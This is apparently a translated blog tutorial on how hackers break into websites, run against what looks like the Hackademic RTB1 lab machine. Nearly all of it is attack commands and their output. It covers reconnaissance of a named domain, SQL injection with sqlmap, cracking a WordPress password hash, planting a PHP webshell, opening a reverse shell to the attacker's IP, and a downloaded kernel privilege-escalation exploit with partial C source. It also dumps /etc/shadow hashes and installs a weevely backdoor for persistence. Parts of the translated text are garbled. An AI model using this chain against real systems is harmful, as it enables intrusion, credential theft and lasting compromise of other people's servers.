This question is difficult to answer, simply speaking, there are many ways to invade a website. The purpose of this article is to demonstrate the techniques that hackers commonly use to scan and invade websites.
Suppose your site is: hashlinux.com
Let's ping this server:
We got an IP address: 173.236.138.113– This is the IP address of our destination server.
Sameip.org can help us find other domains that bind to this server
Same IP
Sites hosted on IP Address 173.236.138.113
There are 26 sites on this server (173.236.138.113). Many hackers will choose to attack different sites on the same server to invade your site. But for the purposes of learning, we only choose to invade your server.
We need to get a message from your site:
1.DNS Records (A,NS,TXT,MX and SOA)
2. Type of Web server (APACHE,IIS,TOMCAT)
3. Domain name registration information (which company owns this domain name)
4. Your name, address, email and phone number
5. The type of script that is running on your website (php,asp,asp.net,jsp,cfm)
6. Type of operating system for the server (Unix,linux,windows,solaris)
7. Ports open to the server (80,443,21, etc.)
Now let's look for the DNS records for the site. Select Site "who.is" to achieve this goal.
We found that the DNS records on the site were:
Let's check the type of Web server:
We can see that the website server is using Apache. We'll check the Apache version later.
hashlinux.com SITE Information
ip:173.236.138.113
Website status:active
Server Type:apache
Alexa trend/rank:1 month:3,213,968 3 month:2,161,753
Page views per visit:1 month:2.0 3 month:3.7
Next we look for the domain name registration information:
We have registered people and other important information. We can use Whatweb to detect what scripting language your site is using, as well as the type of operating system and the version of the Web server.
We can see that the website is using WordPress, the operating system type is Fedora Linux, the website server version is Apache 2.2.15, let us check the server on the open port:
We use Nmap:
1. Detect which services are running on the server:
[Email protected]:/# nmap-sv hashlinux.com
Starting Nmap 5.59beta1 (http://nmap.org) at 2011-12-28 06:39
Nmap Scan Report for hashlinux.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown:998 filtered ports
PORT State SERVICE VERSION
22/TCP closed SSH
80/TCP Open http Apache httpd 2.2.15 (Fedora)
MAC address:00:0c:29:01:8a:4d (VMware)
Service Detection performed. Incorrect results at http://nmap.org/submit/.
Nmap done:1 IP Address (1 host up) scanned in 11.56 seconds
2. Detecting the server's OS
[Email protected]:/# nmap-o hashlinux.com
Starting Nmap 5.59beta1 (http://nmap.org) at 2011-12-28 06:40
Nmap Scan Report for hashlinux.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown:998 filtered ports
PORT State SERVICE
22/TCP closed SSH
80/TCP Open http
MAC address:00:0c:29:01:8a:4d (VMware)
Device type:general Purpose
Running:linux 2.6.X
OS details:linux 2.6.22 (Fedora Core 6)
Network distance:1 Hop
OS Detection performed. Incorrect results at http://nmap.org/submit/.
Nmap done:1 IP Address (1 host up) scanned in 7.42 seconds
The server only has 80 ports open and the operating system is Linux 2.6.22 (Fedora Core 6)
Now that we've got all the important information, let's do a bit of vulnerability testing, such as SQL injection, blinds, LFI,RFI,XSS,CSRF, etc.
We use nikto.pl to get information and weaknesses:
[Email protected]:/pentest/web/nikto# perl nikto.pl-h http://hashlinux.com
-Nikto v2.1.4
---------------------------------------------------------------------------
+ Target ip:192.168.1.2
+ Target Hostname:hashlinux.com
+ Target port:80
+ Start time:2011-12-29 06:50:03
---------------------------------------------------------------------------
+ server:apache/2.2.15 (Fedora)
+ ETag header found on server, inode:12748, size:1475, mtime:0x4996d177f5c3b
+ apache/2.2.15 appears to being outdated (current was at least apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 is also current.
+ Allowed HTTP methods:get, HEAD, POST, OPTIONS, TRACE
+ Osvdb-877:http TRACE method is active, suggesting the host was vulnerable to XST
+ OSVDB-3268:/icons/: Directory indexing found.
+ OSVDB-3233:/icons/readme:apache default file found.
+ 6448 Items checked:1 error (s) and 6 item (s) reported on remote host
+ End time:2011-12-29 06:50:37 (seconds)
---------------------------------------------------------------------------
+ 1 Host (s) tested
You can also use W3AF, a tool that can be found in Backtrack 5 R1
[Email protected]:/pentest/web/w3af#./w3af_gui
Starting W3AF, running on:
Python version:
2.6.5 (r265:79063, APR 16 2010, 13:57:41)
[GCC 4.4.3]
GTK version:2.20.1
PyGTK version:2.17.0
W3af-web application Attack and Audit Framework
version:1.2
revision:4605
Author:andres Riancho and the W3AF team.
We can insert the URL and select the full audit option:
Wait a moment and the results will appear.
There are SQL injection vulnerabilities and other vulnerabilities in the Web site.
Let's go deep into SQL injection:
http://hashlinux.com/Hackademic_RTB1/?cat=d%27z%220
This address is the injection point,
We'll use Sqlmap and dump all the database information needed for the intrusion.
Sqlmap–u URL
Wait for a moment:
Select "N" to continue:
The SQL injection type of the site is the version of the error-based MySQL database is 5.
Add the parameter "-dbs" to find all the databases:
We have found 3 databases:
Exporting WordPress database tables with Dump–dwordpress-tables
We need to export the "wp_users" table to get user information and password hash, then we can try to crack the password finally landed in WordPress backstage.
Using the parameter "-T Wp_users–columns"
22 columns of data were found:
Use the parameter-C user_login,user_pass–dump to export the column.
Then we get the account password.
Then use this website to convert MD5 to plaintext (not all hashes can be converted successfully)
"Http://www.onlinehashcrack.com/free-hash-reverse.php"
The plaintext password is: q1w2e3
User name "Georgemiller"
Let's log in to WordPress backstage:
Now let's try uploading a PHP Webshell to execute some Linux commands on this server.
Edit WordPress "Textile" Plugin
Edit it
Insert a PHP Webshell instead of a real plugin. Then click Upload, PHP Webshell is successfully uploaded to the server.
Now, PHP Webshell is running successfully. Now you can browse all the files on the site, but we want the root of the server and then invade other sites.
Select "Back-connect" in PHP Webshell and connect to our IP "192.168.1.6″ port" 5555″
Before we click on the connection, we must first listen to a "5555" port on this machine.
Click Connect and we'll get a window like this:
Let's try the Linux command.
Id
uid=48 (Apache) gid=489 (Apache) groups=489 (Apache)
Pwd
/var/www/html/hackademic_rtb1/wp-content/plugins
Uname-a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat 7 21:41:45 EST i686 i686 i386 gnu/linux
The ID command is used to tell us the user ID and user group
The PWD command can tell us where we are now.
The Uname–a command is used to get some information and kernel version
Well, we now know that the kernel version of the server is 2.6.31.5-127.fc12.1686
Ok, now we knew this server kernel version is 2.6.31.5-127.fc12.1686
We can find the exploit for this version in exploit-db.com.
Input: "Kernel 2.6.31"
The above results are not appropriate because they are not used for power. Next, that's it!
http://www.exploit-db.com/exploits/15285
Copy this connection
http://www.exploit-db.com/download/15285
In the Netcat shell, enter:
wget Http://www.exploit-db.com/download/15285-O roro.c
--2011-12-28 00:48:01--http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com ... 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80 ... Connected.
HTTP request sent, awaiting response ... 301 Moved Permanently
location:http://www.exploit-db.com/download/15285/[following]
--2011-12-28 00:48:02--http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80 ... Connected.
HTTP request sent, awaiting response ... OK
length:7154 (7.0K) [Application/txt]
Saving to: ' RORO.C '
0K ... 100% 29.7k=0.2s
We use the wget command to get exploit-db.com Exploit,-o is to rename the file as: roro.c
Note:
Linux kernel exploits most are developed in C language, so we save the suffix named. C, directly browse the source file can be directly see source code:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include
#include
#include
#include <errno.h>
#include <string.h>
#include
#include
#define Recvport 5555
#define SendPort 6666
Intprep_sock (Intport)
{
INTs, ret;
Structsockaddr_in addr;
s = socket (pf_rds, sock_seqpacket, 0);
if (s < 0) {
printf ("[*] Could not open socket.\n");
Exit (-1);
}
Www.hashlinux.com
memset (&addr, 0, sizeof (addr));
All the above lines indicate it is exploit are written in C language
After we saved our exploit on server, we'll compile it to elf format by typing
After we save exploit on the server, we can compile it:
GCC Roro.c–o RoRo
Then execute the exploit:
./roro
[*] Linux kernel >= 2.6.30 RDS socket Exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses ...
[+] Resolved Rds_proto_ops to 0xe09f0b20
[+] Resolved Rds_ioctl to 0xe09db06a
[+] Resolved Commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] overwriting function pointer ...
[*] Linux kernel >= 2.6.30 RDS socket Exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses ...
[+] Resolved Rds_proto_ops to 0xe09f0b20
[+] Resolved Rds_ioctl to 0xe09db06a
[+] Resolved Commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] overwriting function pointer ...
[*] Triggering payload ...
[*] Restoring function pointer ...
Id
At this time we are already root authority.
Uid=0 (Root) gid=0 (root)
We can browse/etc/shadow file
Cat/etc/shadow
root:$6$4l1ovmlpsv28evct$fqycc5mozz8mqiqgfudlshuk7r1emu/ Fxw3pocob39lxekt9vy6hygkxcleo.ab9f9t7bqtdxsjvccy.iylcp0:14981:0:99999:7:::
Bin:*:14495:0:99999:7:::
Daemon:*:14495:0:99999:7:::
Adm:*:14495:0:99999:7:::
Lp:*:14495:0:99999:7:::
Sync:*:14495:0:99999:7:::
Shutdown:*:14495:0:99999:7:::
Halt:*:14495:0:99999:7:::
Mail:*:14495:0:99999:7:::
Uucp:*:14495:0:99999:7:::
Operator:*:14495:0:99999:7:::
Games:*:14495:0:99999:7:::
Gopher:*:14495:0:99999:7:::
Ftp:*:14495:0:99999:7:::
Nobody:*:14495:0:99999:7:::
vcsa:!! : 14557::::::
avahi-autoipd:!! : 14557::::::
Ntp:!! : 14557::::::
dbus:!! : 14557::::::
rtkit:!! : 14557::::::
nscd:!! : 14557::::::
tcpdump:!! : 14557::::::
avahi:!! : 14557::::::
haldaemon:!! : 14557::::::
openvpn:!! : 14557::::::
Apache:!! : 14557::::::
saslauth:!! : 14557::::::
mailnull:!! : 14557::::::
smmsp:!! : 14557::::::
smolt:!! : 14557::::::
Sshd:!! : 14557::::::
pulse:!! : 14557::::::
Gdm:!! : 14557::::::
P0wnbox. Team:$6$rparluwe8rm9avwv$a5cooducqqy7ngvtnxafj2d5smggrrfsr6tp8g7iatveet37lugjyvhm1myhelcypkijd8yv5olmnuhwbql76 /:14981:0:99999:7:::
Mysql:!! : 14981::::::
Browse/etc/passwd file
cat/etc/passwd
Root:x:0:0:root:/root:/bin/bash
Bin:x:1:1:bin:/bin:/sbin/nologin
Daemon:x:2:2:daemon:/sbin:/sbin/nologin
Adm:x:3:4:adm:/var/adm:/sbin/nologin
Lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
Sync:x:5:0:sync:/sbin:/bin/sync
Shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
Halt:x:7:0:halt:/sbin:/sbin/halt
Mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
Uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
Operator:x:11:0:operator:/root:/sbin/nologin
Games:x:12:100:games:/usr/games:/sbin/nologin
Gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
Ftp:x:14:50:ftp User:/var/ftp:/sbin/nologin
Nobody:x:99:99:nobody:/:/sbin/nologin
Vcsa:x:69:499:virtual Console Memory Owner:/dev:/sbin/nologin
Avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
Ntp:x:38:38::/etc/ntp:/sbin/nologin
Dbus:x:81:81:system message Bus:/:/sbin/nologin
Rtkit:x:498:494:realtimekit:/proc:/sbin/nologin
NSCD:X:28:493:NSCD Daemon:/:/sbin/nologin
Tcpdump:x:72:72::/:/sbin/nologin
Avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
Haldaemon:x:68:491:hal Daemon:/:/sbin/nologin
Openvpn:x:496:490:openvpn:/etc/openvpn:/sbin/nologin
Apache:x:48:489:apache:/var/www:/sbin/nologin
saslauth:x:495:488: "SASLAUTHD user":/var/empty/saslauth:/sbin/nologin
Mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin
Smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin
Smolt:x:494:485:smolt:/usr/share/smolt:/sbin/nologin
Sshd:x:74:484:privilege-separated Ssh:/var/empty/sshd:/sbin/nologin
Pulse:x:493:483:pulseaudio System Daemon:/var/run/pulse:/sbin/nologin
Gdm:x:42:481::/var/lib/gdm:/sbin/nologin
P0wnbox. Team:x:500:500:p0wnbox. Team:/home/p0wnbox. Team:/bin/bash
Mysql:x:27:480:mysql Server:/var/lib/mysql:/bin/bash
We can use "John the Ripper" to hack the user's password, but we won't do it.
Hackers need to leave a backdoor on the server for easy access later.
Here, we use weevely to generate a small, password-coded PHP backdoor, which is then uploaded to the server to achieve the goal.
Weevely usage:
[Email protected]:/pentest/backdoors/web/weevely#./main.py-
Weevely 0.3-generate and manage Stealth PHP backdoors.
Copyright (c) 2011-2012 weevely developers
website:http://code.google.com/p/weevely/
Usage:main.py [Options]
Options:
-H,--help show this help message and exit
-G,--generate generate backdoor crypted code, Requires-o and-p.
-O OUTPUT,--output=output
Output filename for generated backdoor.
-C COMMAND,--command=command
Execute a single command and exit, Requires-u And-p
.
-T,--terminal Start a terminal-like session, Requires-u And-p.
-C CLUSTER,--cluster=cluster
Start in cluster mode reading items from the Give
File, in the form ' Label,url,password ' where label is
Optional.
-P PASSWORD,--password=password
Password of the encrypted backdoor.
-u URL,--url=url Remote backdoor URL.
Create a PHP backdoor with a password
[Email protected]:/pentest/backdoors/web/weevely#./MAIN.PY-G-O hax.php-p koko
Weevely 0.3-generate and manage Stealth PHP backdoors.
Copyright (c) 2011-2012 weevely developers
website:http://code.google.com/p/weevely/
+ Backdoor file ' hax.php ' created with password ' Koko '.
Upload a php backdoor via PHP Webshell
Once the upload is complete, we use the command to connect:
[Email protected]:/pentest/backdoors/web/weevely#./main.py-t-U http://hashlinux.com/Hackademic_RTB1/wp-content/ Plugins/hax.php-p Koko
Weevely 0.3-generate and manage Stealth PHP backdoors.
Copyright (c) 2011-2012 weevely developers
website:http://code.google.com/p/weevely/
+ Using method ' System () '.
+ Retrieving terminal basic environment variables.
[[email protected]/var/www/html/hackademic_rtb1/wp-content/plugins]
Test our hax.php back door.
[via Infosecinstitute translation PPSBB]
This article is from the "lake and Laughter" blog, please make sure to keep this source http://hashlinux.blog.51cto.com/9647696/1793837
How hackers have hacked into your site